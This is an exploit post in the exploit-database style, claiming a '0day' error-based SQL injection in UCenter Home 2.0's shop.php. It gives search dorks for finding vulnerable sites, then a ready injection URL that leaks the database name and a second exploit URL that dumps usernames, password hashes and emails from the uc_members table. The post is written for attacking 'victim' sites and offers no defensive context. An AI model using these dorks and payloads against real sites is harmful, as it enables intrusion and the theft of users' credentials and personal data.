__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.
Use hex conversion, then edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1